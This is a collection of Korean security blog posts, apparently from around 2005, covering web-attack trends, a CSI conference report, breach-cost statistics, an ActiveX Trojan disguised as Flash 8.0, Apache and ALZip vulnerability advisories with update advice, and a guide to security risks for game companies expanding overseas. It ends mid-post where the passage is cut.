운영체제의 계정이나 권한 획득이 아닌 온라인 상의 유저들의 정보를 얻기 위한 코드들과 어뷰징이 성행 할 수 밖에 없으며 위험성은 더욱 높아 질 것이다.

 

시스템 자체의 공격이 더 이상 중요하지 않다는 의미는 아니나 또 다른 분야에서의 대형 이슈가 향후에는 출현을 한다는 것이다.

 

크로스 사이트 스크립팅을 막지 않으면 대부분 문제가 발생 할 수 밖에 없으며 모든 문제의 근본은 Validation check에 존재하고 있다. SQL Injection도 마찬가지 이며 CSS Attack도 마찬가지이다.

 

Web Method를 이용한 Application 공격도 충분히 예상을 할 수 있어야 하며 자동화된 공격으로 변질 될 경우의 탐지 로직에 대해서도 보안 전문가라면 충분히 고민을 해야만 한다.

 

이래저래 이슈들은 계속 묻혀져 있다 적당한 시점에 계속 이슈화 된다. 해야 할일들과 그만큼 관심을 두고 정리를 해야 하는 부분들이 많아진 것이라 할 수 있다.

 

올해 BlackHat에는 참가하지 못했지만 여러 발표자료들을 보면서 크고 놀랍고 센셔이널한 이슈들은 아니여도 전문적이고 깊이 있는 분석들을 몇 몇 발견 할 수 있었다.

그 깊이가 또 다른 경험을 낳을 수 있을 것이라 생각된다.

 

간단하게..정리

Posted by 바다란

댓글을 달아 주세요

몇 가지 느낀점이 있는데 간단하게 언급을 하면 다음과 같습니다.
차후 다시 정리를 해볼께요.

CSI  컨퍼런스 :
- 각국 보안 전문가 들이 참가를 하며 주로 미국 인력 ( 정부 기관 및 보안 담당자, 보안 업체 인력 )들이 참여를 합니다. 제품 전시회와 컨퍼런스를 같이 개최를 하며 상당히 조직적으로 운영이 됩니다.

* 보안이라는 전 분야에 걸쳐 ( Policy , 기술 , 개발 , Forensic , Web ,감사 ,해킹 등 ) 기술 단계별로 분류한 후  이슈에 대해 세션을 가지고 운영을 합니다. 3일간의 기간 동안 각 섹터별로 세션을 계속 끌고 가더군요.

* 각 단계별로 발표하는 자료에는 구라들도 상당 부분 있었고 가장 마음 아팠던 부분은 정부 기관에서 주도적으로 지원을 하고 있으며 한 분야의 전문가라도 상당히 많은 인지도를 지니고 인정을 받는 것이 속 쓰리더군요.

* 전체적인 기술 수준은 최상위 수준의 경우에도 그다지 이해하기 어렵지는 않았으며 기술레벨이나 세미나의 내용도 그리 높은 수준은 아니였습니다. 그러나 종사 인력이 많아서 그런지 분야에 대해 깊이 있는 이해를 하는 인력들을 종종 볼 수 있었습니다. 우리 처럼 만능 슈퍼맨은 못 봤습니다. ㅠ,ㅠ

* 질문할 내용도 많았고 궁금한 사안도 많았지만 그들만의 리그이고 또 네이티브가 아니다 보니 애로사안들이 돌출 하더군요.. 때론 조잡한 세션들도 많이 있었습니다.

* 전체적으로 풍족하게 컨퍼런스를 진행 하더군요 ( 참가비를 비싸게 받으니..쩝 )  식사 제공 및 기업들의 스폰서 후원이 매우 상당한 수준이였습니다.  - 국방 관련 및 국가 관련 프로젝트에 있는 인력들이 많다보니 기업들의 공식적인 로비 수준으로 접근을 하더군요.

* 개발 및 웹 , 포렌식 , 정책 등의 각 분야별로 폭넓은 저변인력을 가지고 있는 것에 매우 부러웠다는....

* 해킹 관련 세션들도 있었으나 그 수준은 그다지 높지 않았으나 일반적인 보안 인력들에게는 매우 호응도가 높았습니다. 이런 해킹 세션들은 최근의 컨퍼런스 붐에 따른 부가적인 장착이 아닌가 하는 생각도 들더군요.

-------------------
결론적으로 보안이라는 큰 테두리에서 움직이는 역량을 볼 수 있었습니다.  전반적인 기술레벨은 그다지 높지 않았으며 개인적인 평가로 보면 국내 인력들도 각 분야 인력들이 회사 제품 선전하는 설명회 할 여력을 다 모아서 럭셔리 하게 세션 스케쥴 잡아서 진행하면 독자적인 역량을 지닐 수 있을 것을 판단 됩니다.  또 그만큼의 실력도 충분히 됩니다. 각 분야별로 다 일정정도의 전문 영역에 국내 보안 인력들은 도달한 것으로 보입니다. 다만 문제는 세계적인 흐름을 주도하기 위해서는 영어권역에 속해 있는 것이 매우 좋았을 것이나 이 문제로 인하여 향후에도 흐름 주도는 힘들어 보입니다.

성격상 여러 회사를 전전한 까닭에 많은 부분을 보고 느꼈지만 국내도 역량의 결집시 상당히 높은 수준으로 집합이 될 것으로 보입니다. 다만 정책적인 지원이나 주도적인 리딩이 없다는 것이 문제가 되겠죠. Concert와 같은 기회가 좋은 찬스이나  이 세션을 보다 확대하고 다양한 분야에서 참여 하도록 하여야 하며 사전에 일정 수준 이상으로 거를 수 있다면 아주 좋은 기회가 될 듯 싶습니다. 물론 리딩을 하는 그룹의 의지가 있어야 겠지요.

아무튼 가서 궁금증을 해소하든 새로운 주제를 던지든 회화는 자유자재로 해야 할 것 같습니다. 생활영어 말구요..  레벨이나 전문 분야에 대한 내용은 오래지 않아 다시 정리해 보도록 하겠습니다.
간단하게 의견 피력이 필요 할 것 같아. 급히 써 봅니다.

좋은 하루 되세요.
Posted by 바다란

댓글을 달아 주세요

 

안녕하세요 바다란입니다.

 

 

금일자 해킹/바이러스 뉴스를 보다보니 다음과 같은 의미 있는 수치가 발견이 되었습니다.

그동안 막연하게 해킹을 당할 경우 이미지 손실이나 매출액에 부정적인 영향을 미친다고만 알고 있었는데  본격적인 수치로 측정이 된 사례는 이번이 처음인 것 같습니다.

 

해킹 및 크래킹으로 인한 피해 대비 보안 투자 비용은 언제나 고민 스러운 부분이지만 현재 상황에서 IT 기업의 연속성을 유지 하기 위해서는 필수비용이라고 판단이 됩니다. 관련된 소식은 해당 기사를 참조 하시면 될 것 같습니다.

 

http://news.naver.com/news/read.php?mode=LSS2D&office_id=030&article_id=0000131518&section_id=105&section_id2=283&menu_id=105

 

기사에서 언급하듯이 기업의 이미지는 25% 하락하고 매출액에도 12% 이상 영향을 미치는 것으로 발표가 되었습니다.

발표주체는 CONCERT ( Consortium of CERT ) 이며 국내 기업들에 존재하는  침해사고 대응팀의 협의체 입니다.

 

침해사고 대응팀이라는 것이 명목상으로 존재하는 곳들도 있지만 실제 국내 대기업 및 주요 기업들은 다 포함이 되어 있으며 해당 이슈에  미루어  짐작을 해볼때  중요한 의미를 파악 할 수 있습니다.

 

특히 IT 자산을 기반으로 하는  회사의 경우 기사에서 언급된 내용 보다 더욱 심할 것으로 예상이 됩니다. 매출액에 영향을 주는 점은 순간적이나 장기적으로 브랜드 이미지의 하락의 만회는 상당한 시일이 걸린다는 점에서 더욱 중점을 두어야 될 것 같습니다.

 

 

보안의 실행 부분에 대해서

 

예전 부터 보안은 보험이다 라는 이야기를 많이들 했었습니다.

그러나 이제는 바뀌게 되었죠. 보안은 성장을 위한 필수요소로....

 

국내의 많은 기업들 특히 IT 기반의 기업들의 대부분은 침해사고에 대한 사실을 공개하지 않고 있습니다. 그만큼 영향력이 있다는 반증이기도 합니다.  최근 침해 사고를 보게되면 한번 침입 발생 이후  원인제거가 아닌 현상의 제거를 통해 ( 단순히 웹소스의 부분 수정 이나 악성코드의 제거 ) 문제 해결을 하려는 시도를 많이 봐왔습니다. 또 이런 기업들은 어김없이 추가 침입을 당한 사례도 많이 있습니다.

 

개발 프로세스의 문제 혹은 외주 개발사의 문제 등등 발생 될 수 있는 문제는 많고  명확하게  처리 할 수 있는 인력은 없고...

 

지금도 그러하고 앞으로도 그럴 것으로 생각이 되지만  명확한 현상에 대한 처리 및 추가 대응책. 문제의 원인을 짚어서 그 원인을 원천적으로 제거하고 사전 예방이 되도록 만드는 많은 행위는 기존의 구성원들과 많은 대화 및 구성원들의 도움이 없이는 되지 않습니다.

 

국내에도 많은 보안업체들이 있습니다. 전문 서비스를 받는 것도 일시적으로 효과를 볼 수 있습니다. 그러나 적합한 대책 및 이슈에 대한 리딩은 한계가 있을 수 밖에 없습니다.  단기적인 비용을 투자해 순간적인 효과를 볼 수 있으나 깊이 있는 대응 및 리딩을 위해서는 여력이 되는 기업에 한해 보안  조직 구성은 필수의 시대인 것 같습니다. 다른 기업들에게도 많은 부담외 되겠죠

 

브랜드 가치의 하락 및 매출에 직접적인 영향을 줄 수 있다는 점. 이제는 보안이라는 이슈가  보조가 아닌 주된 역량을 기울여야만 되는 영역이라는 점을 알 수 있게 해주는 수치 인 것 같습니다.

 

Posted by 바다란

댓글을 달아 주세요

 

새로운 방식의 공격기법이 발견이 되었습니다. 따라서 주의가 필요합니다.

해당 백도어는 국내사이트를 해킹 한 이후 국내사이트에 Flash.ocx 파일을 올립니다. 그리고 해당 ocx가 위치된 링크를 또 다른 국내 사이트 ( 유명 사이트 )를 해킹 한 후 iframe 등을 이용하여 실행이 되도록 만들어져 있습니다. 기존 패치와는 관계 없는 새로운 기법이므로 많은 피해가 예상 되며 빠르게 변형들이 출현 할 것으로 예상 됩니다.  웹서버의 취약성으로 인해 악성코드 실행 명령이 추가된 웹페이지를 방문할 경우 ocx 파일 설치가 진행이 되게 되죠. 대부분의 일반 유저는 Flash 라는 이름만을 보고 설치를 진행할 것으로 보입니다.

 

OCX 파일 설치시에  보안 경고 창이 활성화 되고 여기에서 사용자를 속일 수 있는 Microsoft Flash 8.0 이라는 프로그램명으로 설치가 되도록 되어 있습니다.

해당 OCX 설치시에는 프로그램에 explorer.exe 파일이 시스템 디렉토리에 설치 되며

특정 온라인 게임 이용시에 사용자 정보를 획득 하도록 되어 있습니다.

 

지난 주 까지는 몇 달 동안 계속 되어온 05-001 패치 넘버와 관련된 .chm 파일 실행시의 임의의 명령실행이 되는 버그를 이용하여 정보 유출 시도를 끊임 없이 했는데 패치가 설정된 개인 PC가 증가함에 따라 .chm 파일의 실행 버그를 통한 정보 유출이 계속 줄어 들게 되고 따라서 공격하는 크래커 그룹들이 다른 유형으로 변형을 한 것으로 보입니다.

앞으로도 이와 같은 시도가 많이 발생할 것으로 보이고 해당 내용은 타 바이러스 및 백도어 유포시에도 동일하게 사용이 될 수 있으므로 주의가 필요합니다.

 

특정 사이트를 방문하였을때 보안 경고창이 활성화 될 경우 주의깊게 보셔야 할 것 같습니다.

공격하는 쪽의 기술 발전 속도가 빠르게 높아 지고 있어서 우려가 됩니다. 

 

 

* 해킹이나 크래킹에서의 사회공학이란 의미는 속인다는 의미와 유사하다고 보시면 됩니다.

===================================================================================

 

  

 

 

[마이데일리 = 은정 기자] 기존의 인터넷 익스플로러 취약점 유포방식과 달리 액티브 엑스(Active X) 방식을 사용하여 '플래쉬 8.0 프로그램'으로 위장, 사용자 컴퓨터에 국내 온라인 게임 사용자의 아이디와 암호 유출을 시도하는 트로이 목마가 발견돼 주의가 요망된다.

 

백신업체 ㈜지오트의 바이러스 분석실(GCERT)은 기존 인터넷 익스플로러의 보안 취약점을 악용한 방식이 더 이상 효과를 보지 못할 것으로 예측한 해커들이 새로운 유포 방식을 만들고 있다고 말했다.

 

해킹된 두 곳의 국내 사이트들을 확인한 결과 '플래쉬 8.0 프로그램'으로 위장한 보안경고창이 나오게 되며, 사용자가 동의할 경우 윈도우 폴더에 트로이목마가 설치되게 된다.

 

사용자가 해킹된 사이트에 접속했을 때 마치 정상적인 플래쉬 관련 액티브 엑스 컨트롤로 위장하여 사용자가 직접 설치하도록 유도하고 있는 것이 변경된 해킹 수법의 특징이다.

 

''버튼을 누르면 윈도우 폴더의 Downloaded Program Files 폴더에 설치가 되며 감염이 되면 윈도우 폴더에 'explore.exe(52,736 바이트)' 파일이 숨김속성으로 생성된다. 이 트로이목마는 국내 온라인 게임사용자의 아이디와 암호 등을 유출시키고자 시도하는 악성프로그램이다.

 

지오트는 긴급히 해당 사이트 보안 담당자에게 메일로 내용을 전달했으며, 한국정보보호진흥원(KISA) 인터넷침해사고대응지원센터 해킹대응팀에게도 제공한 상태이다.

 

지오트 바이러스 분석실(GCERT)문종현 실장은 “시간이 지날수록 해킹 방법이 지능적이고 기발하게 변화되고 있다”며 “잘 모르는 사이트를 방문할때나 자주 방문하는 사이트더라도 팝업창 등은 자세히 살펴보고, 백신의 실시간 감시 기능을 항상 켜놓아야 한다”고 말했다.

 

[액티브 엑스로 위장, 트로이목마 설치하는 새로운 수법이 나타났다.]

 

(박은정 기자 pej1121@mydaily.co.kr)

 

 

Posted by 바다란

댓글을 달아 주세요

바다란입니다.

 

금일 보안 관련 메일링 리스트를 보다 보니 눈에 띄는 두 가지 취약성이 있어서 게시를 하게 되었습니다.
하나는 apache 모듈 관련된 인증 회피 부분이고 하나는 앞으로 나올 가능성이 있는 악성 바이러스와 관련된 Alzip 취약성 입니다.
아마도 Apache는 서비스 영역에 대다수 사용이 되고 있고 Alzip의 경우는 개인 사용자 단위에서 많이 사용하고 있을 것입니다. 따라서 주의가 필요합니다.

 

* 바이러스에 악용될 신규 취약성인 Alzip은 6.13 버전으로 업데이트 권고 드립니다. - 개인 사용자
* Apache . .htaccess 에서 require group 지시어 사용시 1.5 또는 2.1 버전으로 업데이트 권고 드립니다.

 

Apache의 Mod_auth_shadow 모듈에 대해 인증 회피가 가능한 문제가 발견이 되었습니다.
내부적으로 서비스에서 apache를 이용하고 인증 관련된 부분에 mod_auth_shadow 모듈을 사용한다면 업데이트를 권고 합니다.


모듈 사용시 apache Version을 1.5 또는 2.1 버전 이상으로 업데이트를 권고합니다.
mod_auth_shadow 모듈은 .htaccess 에서 require group 이라는 지시어를 사용할 때 자동적으로 사용이 됩니다. 따라서 해당 지시어를 사용하는지 확인이 필요할 것 같습니다.

ALZIP 관련된 문제는 메일을 통해 압축 파일을 받았을 경우 또는 메신저나 파일 공유를 통해서 압축된 파일을 받았을 경우에 시스템에 영향을 미칠 수 있습니다. 신규 전파 가능한 경로로서 이용이 될 수 있을 것 같습니다.


압축된 파일을 풀때 경계를 체크하지 않은 문제로 인해 오버플로우 코드를 심을 수 있습니다. 스택 및 힙 오버플로우가 동시에 발견 되었고 ARJ , ALZ 파일의 경우는 열었을 경우 악성코드가 실행이 되며 그외의 압축 파일은 압축 파일을 풀때 악성코드가 실행이 됩니다.

따라서 한국을 겨냥한 특정 바이러스의 살포도 가능한 취약성이며 향후 개인사용자들을 대상으로 무작위로 퍼질 가능성이 있는 문제중의 하나입니다.
사용하시는 압축툴이 알집일 경우 버전을 확인 하시고 업데이트 반드시 하셔서 차후에 발생할 수 있는 피해를 미연에 막는 IT 생활의 지혜를 누리시길 ^^

 

=========================================================================================

TITLE:
Apache mod_auth_shadow Module "require group" Incorrect Authentication

SECUNIA ADVISORY ID:
SA17060

VERIFY ADVISORY:
http://secunia.com/advisories/17060/

CRITICAL:
Less critical

IMPACT:
Security Bypass

WHERE:
From remote

SOFTWARE:
mod_auth_shadow (module for Apache)
http://secunia.com/product/2811/

DESCRIPTION:
David Herselman has reported a security issue in the mod_auth_shadow module for Apache,
which potentially can be exploited by malicious people to bypass certain security restrictions.

The problem is that the mod_auth_shadow authentication scheme is automatically used when using the
"require group" directive in a ".htaccess" file, which may be different than the intended HTTP authentication scheme.

SOLUTION:
Update to version 1.5 or 2.1.
http://sourceforge.net/project/showfiles.php?group_id=11283

PROVIDED AND/OR DISCOVERED BY:
David Herselman

ORIGINAL ADVISORY:
Debian:
http://www.debian.org/security/2005/dsa-844

 

=========================================================================================
TITLE:
ALZip Multiple Archive Handling Buffer Overflow

SECUNIA ADVISORY ID:
SA16847

VERIFY ADVISORY:
http://secunia.com/advisories/16847/

CRITICAL:
Moderately critical

IMPACT:
System access

WHERE:
From remote

SOFTWARE:
ALZip 6.x
http://secunia.com/product/5669/
ALZip 5.x
http://secunia.com/product/5668/

DESCRIPTION:
Secunia Research has discovered a vulnerability in ALZip, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to multiple boundary errors when reading the filename of a compressed file
from ALZ, ARJ, ZIP, UUE, or XXE archives. This can be exploited to cause a stack-based buffer overflow (ALZ), or a heap-based buffer overflow (ARJ / ZIP / UUE / XXE).

Successful exploitation allows execution of arbitrary code when a malicious ALZ / ARJ archive is opened, or when a ZIP / UUE / XXE archive is extracted.

The vulnerability has been confirmed in the following versions:
* ALZip v6.12 (Korean)
* ALZip v6.1 (International)
* ALZip v5.52 (English)

Prior versions may also be affected.

SOLUTION:
Update to version 6.13 (Korean and International).


 

Posted by 바다란

댓글을 달아 주세요

KISA에서 제작하는 온라인 게임 해킹 대응 가이드에 실린 글입니다.

 

 

해외진출 시의 보안상 주의 사례 :

 

2000년도 이후부터 우리의 온라인 게임들은 해외에 다수 진출 하였다. 현지 퍼블리싱 업체와 손을 잡고 합작 진출을 한 경우와 직접 진출을 한 경우를 볼 수 있다. 대표적인 해외 진출 국가는 중국/일본/미국을 들 수 있으며 국가는 계속 확대 되는 추세이다. 저작권 법이나 불법 운용에 대한 부정적인 인식이 떨어지는 중국의 경우에는 해외 진출 업체가 지난 몇 년간 곤혹스런 경험을 한 적이 다수 있는 상황이다.

 

예를 들어 현지 업체와 계약을 맺고 상용화 단계에 까지 성공을 하였는데도 입금이 되지 않거나 현지 업체가 고객의 결재 내역을 공개하지 않아 정확한 수치를 확인 하기도 힘든 상황을 맞이 하기도 한 상황이 있고 대금 지급과 관련된 분쟁으로 오랜 기간 동안 힘든 싸움을 했던 경우도 있다.

 

섣부른 로컬라이징 서버의 제공으로 인해 권리 주장도 하지 못한 채 Free 서버 및 독자적인 현지 업체의 상용화로 곤란을 겪은 사례도 있어서 주의가 요구된다.

 

일반적으로 해외 진출 시의 검토 단계는 다음과 같이 이루어 진다.

 

사전 조사 -> 진행 -> 계약 -> 계약 이후의 이행 단계

 

사전조사 단계에서는 시장성에 대한 조사 및 현지 업체에 대한 정보 수집 등이 이루어 지며 면밀한 조사가 필요한 부분이다. 각 게임 개발사들에서 실적을 우선적으로 진행 하다 보면 사전 조사 단계에서의 정보 수집 부족으로 난항을 겪을 수 있다.

 

진행:

현지인 Agent 및 퍼블리셔 들과의 미팅을 통해 신뢰할 만한 파트너 관계를 찾는 과정이다. 서비스에 대한 명확한 이해를 하고 있으며 신뢰할 만한 파트너 인지 여부를 확인 하는 과정이 필요하며 상호간의 서비스 진행에 대한 협조 관계가 성립 할 수 있는지 여부를 검토하고 신중하게 진행을 해야 한다.

직접 진출의 경우에는 현지 국가에 대한 법령 및 체제에 대한 이해 및 법인 설립시의 Risk 요인을 검토하고 종합적으로 판단을 내릴 수 있어야 한다.

 

계약:

간접 진출의 경우 계약 단계에서 고려해야 할 사안들이 많다. WTO 가입 이후에도 저작권에 대한 인식이 약한 중국의 경우에는 국내 게임 업체들의 피해 사례도 다수 있는 상태라 여러 부분에서 주의를 기울여야 하는 부분이다. 계약의 당사자가 신뢰할 만한 당사자인지 또는 과거에 피해를 당한 업체가 있는지를 체크하는 것이 필요하며 피해의 원인 분석 및 원인에 따른 대응 단계를 계약 단계에서 명확하게 문서화 하는 것이 필요하다.

 

계약 이후의 이행단계:

명확하게 대금 지급 과정 및 경로에 대해서 계약단계에서 명확하게 기술 하는 것이 필요하며 해당 내용에 따라 이행하는 단계로서 문제에 대한 해결 [ Hacking 이나 Abusing에 대한 대응] 조건 및 소스코드에 대한 관리 및 서버 운용에 대한 책임등을 명확하게 한 후 이행하는 과정을 검토하는 것이 필요하다.

 

일반적으로 사전조사 , 진행 , 계약 , 이행의 단계로 볼 수 있는데 여러 가지 위험요소가 있을 수 있으나 여기에서는 보안 관련된 측면만 살펴 보기로 하자. 해외 진출 시의 주의 사항은 보안적인 측면에서 살펴보면 다음과 같은 면을 살필 수 있다.

 

위험:

1.       소스코드의 유출

2.       Free 서버 운용 [ 서버 시스템의 관리 및 통제 ]

3.       물리적인 서버의 보안

4.       service에 대한 해킹을 통한 정보 유출 및 권한 획득

5.       게임 서비스에 대한 장애 [ 운용상의 미숙 혹은 외부로부터의 DoS 공격]

6.       게임내의 아이템 등에 대한 내부 유출 문제

 

위험 요소는 크게 6가지 정도로 볼 수 있다. 각 항목에 대해 계약 단계 혹은 이행 단계에서 지켜지고 준수할 수 있도록 명확한 명문화된 규정이 필요하며 언급이 있어야 향후 문제 발생시에도 원활한 대응이 가능할 것이다.

 

1.소스코드의 유출

해외 서비스 제공 시에는 소스코드의 유출은 가급적 하지 않아야 하며 컴파일된 형태의 서버 버전 및 클라이언트 버전 제공이 필요하다. 협력사의 현지화 요구로 인해 제출해야 할 경우에는 핵심적인 부분을 제외한 나머지 부분에 대해서 협력을 하여야 하며 핵심 부분의 경우에는 본사에서 직접 처리 하거나 인력을 통해 처리 하여야만 한다. 소스코드의 관리는 접근제어 및 권한에 따른 분명한 접근이 가능하여야 한다. 암호화된 매개체에 저장이 되어야 하며 외부 유출 시에도 암호화 되어 보호가 가능하여야 한다.

 

2.Free 서버 운용

게임서버의 이미지 유출 및 도난 으로 인하여 Free 서버가 운용될 경우에는 현지 업체와의 계약 단계에서 해당 문제에 대한 언급이 있어야 한다. 동시접속자의 감소로 인한 피해를 현지 업체의 문제가 아닌 경우로 판단하고 책임을 미루는 경우가 있으므로 Free 서버 운용에 대해서는 현지 업체에서의 모니터링 및 대응에 대한 책임이 있음을 분명히 하고 책임감을 지닐 수 있도록 하여야 한다. 지속적인 단속의 경우도 해외 진출국에서만 가능한 부분이므로 진출사의 입장에서는 어려운 부분들이 있을 수 밖에 없다.

 

3.물리적인 서버의 보안

대부분 IDC에 서버가 위치하게 되는데 물리적인 접근 제어 및 권한 통제가 분명하지 않은 IDC가 국가에 따라 있으며 IDC라는 용어 자체가 규격화 되지 않은 곳들이 있다. 또한 지방에서 운영되는 영세 IDC의 경우에는 물리적인 보안 요소를 갖추지 못하고 있으므로 서버의 운영 시에는 물리적인 보안 수준을 준수하는 IDC를 직접 확인 한 이후 본사 차원에서 모니터링 하는 것이 필요하다. 웹캠 혹은 추가 비용을 들여서라도 접근을 통제 하는 것이 필요하며 개발사 자체에서 운영을 하는 것이 필요하다. 영세 업체의 경우에는 현지 퍼블리싱 업체와의 계약 단계에서 명문화 하는 것이 필요하며 IDC에 대한 접근 통제 수준을 확인 하는 것이 반드시 필요하다.  서버 자체에도 고유 Mac Address 등을 인식하여 중앙 본사 차원에 접근을 하여야 실행이 되도록 하는 고유 기술을 두어 중앙 통제가 가능하여야만 한다. 최소한 서버의 외부 유출 시에도 정상적인 서비스가 실행 될 수 없도록 하는 보안 장치는 염두에 두어야만 한다.

 

4.service에 대한 해킹을 통한 정보 유출 및 권한 획득

웹 서비스에 대한 수정이나 이벤트 진행 시에 보안상 취약한 부분이 있을 경우 서비스에 대한 해킹이 발생 할 수 있다. 권한 획득도 가능한 취약성들이 다수 있으므로 Database 및 사용자 정보가 보관된 곳은 외부 노출 시에도 문제가 발생하지 않도록 암호화 하여 보관하는 것이 필수적이며 평문 보관의 경우 치명적인 피해를 입을 수 있다. 피해 발생 시에는 피해에 대한 원인 파악에 따라 보상하는 것이 일반적이므로 해당 규정을 명문화 하는 것도 필요한 사안이다.

 

5.게임 서비스에 대한 장애 [ 운용상의 미숙 혹은 외부로부터의 DoS 공격]

운용상의 미숙 및 외부로 부터의 공격에 대해 현지 업체가 원활한 대응을 하지 못하여 서비스 장애가 발생 하였을 경우 개발사의 품질을 의심하는 사례가 다수 있으므로 문제 발생 시에는 판단하게된 기록의 제공 및 대응 내역을 문서화 하여 공조 하는 것을 검토 하여야 한다. 명확하게 하여야만 피해의 원인 파악 및 보상등에 대해서 논의 하는 것이 가능해 진다.

 

6. 게임내의 아이템 등에 대한 내부 유출 문제

현지 업체의 내부자에 의해 접근이 가능한 Admin Tool의 경우 아이템의 외부 노출등 상당한 위험요소가 존재하므로 신뢰성 있는 직원, 정보보호 교육에 대한 의무화 등에 대해서도 검토를 하는 것이 필요하다. Database에 접근하는 모든 로그들은 삭제할 수 없는 형태로 별도 보관하여 차후에 증빙 할 수 있는 자료로 삼아 보상 및 피해 규모를 산정 할 수 있도록 하는 것이 좋으며 초기 서비스 설비의 설계단계에서부터 최종 정보가 위치하는 Database에 대한 접근 기록에 대해서는 별도 관리가 필요하므로 고려 하여야만 한다.  접근 가능자에 대한 축소 및 주기적인 Auditing도 필요한 부분이며 문제 발생시에는 현지 퍼블리싱 업체가 전적인 책임을 질 수 있도록 명문화 하는 과정도 고려 하여야 한다.

 

 

이상과 같이 해외 진출 시 고려 부분들에 대해서 보안이라는 측면에서 간략하게 알아 보았다. 표준적인 내용은 아니며 다수 발생한 사례들을 기준으로 하여 해당 문제들이 발생하지 않기 위해서는 어떤 점을 고민해야 하고 대안으로 무엇이 있을 수 있는지를 간략하게 알아 보았다. 문제가 발생하는 상황은 많으며 계약의 조건도 다를 수 있다. 그러나 기본적으로 발생하는 6가지 형태의 문제들에 대해서 대책을 가지고 해외 진출을 하게 된다면 보안상 발생하는 문제들에 대해서는 일정 수준 이상의 해결 능력을 지니게 될 것이다.

 

written by p4ssion

Posted by 바다란

댓글을 달아 주세요


프리토리의 오류?

 

한국의 보안 점수는 5~6점이라고 말한 것은 zone-h 에 리스트 되는 다수의 사이트들을 보고 내린 결론입니다. 최근 해킹 되는 국내 사이트를 보면 소액의 금액으로 호스팅 서비스를 해주는 호스팅 서버가 주로 해킹을 당합니다. 호스팅 서버 한 곳 마다 최소 몇 십개에서 몇 백개 가량의 사이트를 서비스 해주고 있습니다. 또 저렴한 비용으로 하다보니 APM 을 선호하죠. 대부분 리눅스 머신에 말입니다.

 

APM(Apache + PHP + Mysql) 조합을 사용하는데 최근 발견되는 취약성의 대부분은 PHP 관련된 Injection 및 외부 파일 실행에 관련된 문제들입니다. 또 국내에서 주로 사용하는 zeroboard 및 phpbb 관련된 게시판이 해외에서 부터 분석이 되어져서 취약성이 나오는 관계로 서버 권한 획득이 매우 쉬운 상태입니다.

 

계속 문제가 발생할 수 밖에 없고 모든 운영자가 보안의 전문가 일 수가 없으므로 당연히 많은 문제가 있습니다. 버전 관리 부터 일상적인 운영에 이르기 까지 문제가 있고 수시로 발생하는 문제들에 대해서 모니터링 하는 인력도 거의 없는 형편입니다.

 

하루에도 몇 천통씩 날라오는 버그트랙이나 취약성 관련된 메일을 모니터링 할 수 있는 사람이 얼마나 될까요?.. 의문입니다.

 

Internet business 가 활성화 되다 보니 우후죽순으로 호스팅 업체가 생겨 났고 기본적인 솔루션 설치만 가능하면 다들 전문가 입니다. 해외 그 어느 곳보다도 저렴한 비용으로 웹 서비스를 운용하는 기업 및 개인 , 사업체가 많습니다. 저렴한 비용에 걸맞는 낮은 보안도 있구요.

 

이런 사이트들을 비교하여 보안 수준을 높이기 위해서는 한국내의 3세대 혹은 4세대 유비쿼터스 망상에서의 수많은 어플리케이션에 대한 검증을 하고 보안성을 높이기 위해서는 전세계의 보안 전문가들 다 끌어 모아도 어려운게 사실 입니다.

 

프리토리가 보는 관점은 서버가 해킹 당하는 비율을 보고 객관적으로 나열하는 것에 지나지 않고 몇년 동안 꾸준히 지켜본 바에 의하면 국내 주요 서버들의 보안성은 대폭으로 신장이 되어 있습니다. 세계 수준에 별로 뒤쳐지지 않습니다.  해킹 당한 곳들도 대부분 보면 영세한 호스팅 업체가 대부분입니다.

지난해 까지만 해도 Apache 및 리눅스 데몬 취약성을 이용해서 해킹을 해서 리스트가 그리 많지 않았으나 지난해 말 부터는 PHP 취약성을 이용해서 대규모로 해킹을 하는 실정입니다. 아마 올 상반기만해도 지난해의 몇배 정도는 되었을 것으로 보입니다.

 

한국의 보안 점수를 정량화 할 수 있느냐 하는 면에 있어서는 좀 의견이 있습니다. 정성적으로 봤을때는 진보 하고 있고 전체적인 수준은 높아지고 있으나 각 분야의 전문가들의 폭이 너무 좁다 보니 ( 또 키우지를 않았죠.. ^^)  몇 몇 전문가들에게 과도한 요구들이 몰리는 경향이 있어서 그나마 있는 인력풀도 흩어지는 경향이 있습니다. 세계적 수준을 요구하면서 대우는 그렇지 못하기도 하지요.

 

무선관련된 이슈 및 피싱 및 개인정보 도용에 관련된 문제는 아직 문제가 많습니다. 또 유비쿼터스 환경의 위협은 이미 3년전에 공개적으로 언급 하였지만 아직도 그리 나아지지는 않았습니다. 전체적인 위협 대응은 나아지고 있으나 전문화된 영역의 대응이 떨어지고 있습니다.

 

세계에서 인증서를 가장 많이 사용하는 나라는 어딜까요?..

PKI 관련 솔루션이 기업환경에 일반화된 나라는 어디 일까요?..

도토리 키재기 이지만 거의 모든 분야의 보안 솔루션을 자체 기술력으로 보유한 나라는 어디 일까요?..

무선 AP가 가장 많이 설치된 도시는 어디 일까요?..

 

프리토리의 오류는 기술의 발전 및 분화를 제대로 보지 못한채 한면 만을 보고 판단한 것에 지나지 않습니다. 그렇다고 우리가 잘하느냐..그것도 아니죠.

 

인력을 키우지 못했고 환경을 조성 하지 못했고 무조건 기술의 발전에만 매달려 앞으로만 달린 후유증은 앞으로 계속 있을 것입니다. 얼마나 그 후유증을 극복하느냐가 중요한 과제인데 과연 어떻게 풀 수 있을까요?.. 무조건적인 기술 적용이 대안은 아닌데도 말입니다.

 

언젠가 말했듯이 분야의 활성화 만이 대안이 될 것이고 보안이나 크래킹이라는 부분이 비즈니스에 치명적인 결과를 초래할 수 있는 부분이여서 충분한 비용을 들여야 한다는 인식이 기업이나 사회 전반에 걸쳐 공감대가 이루어 져야만 합니다. 물론 지금의 비즈니스도 충분히 위험 하구요.

 

편리함이 있으면 그에 따른 위험요소도 있게 마련입니다.

이익이 있으면 그만큼의 위험이 있는 것이 당연 합니다.

 

성장에는 후유증이 따르게 마련이고 지금 우리의 IT 산업 특히 인터넷 관련 분야는 실감할 때 인 것 같습니다. 

 

얼마나 최소화 할 수 있는지가 가장 중요한 관점입니다.

 

http://news.naver.com/news/read.php?mode=LSS2D&office_id=008&article_id=0000557191&section_id=105&section_id2=283&menu_id=105

 

Posted by 바다란

댓글을 달아 주세요

manian쪽에 올린 글인데 예를 들어서 설명 하였으므로 참고할 부분이 있을 것입니다.

도움 되시길.

---------------------------

안녕하세요. 바다란입니다.

다른 사이트들이 기능상의 코딩을 못해서 생기는 문제가 아닙니다.
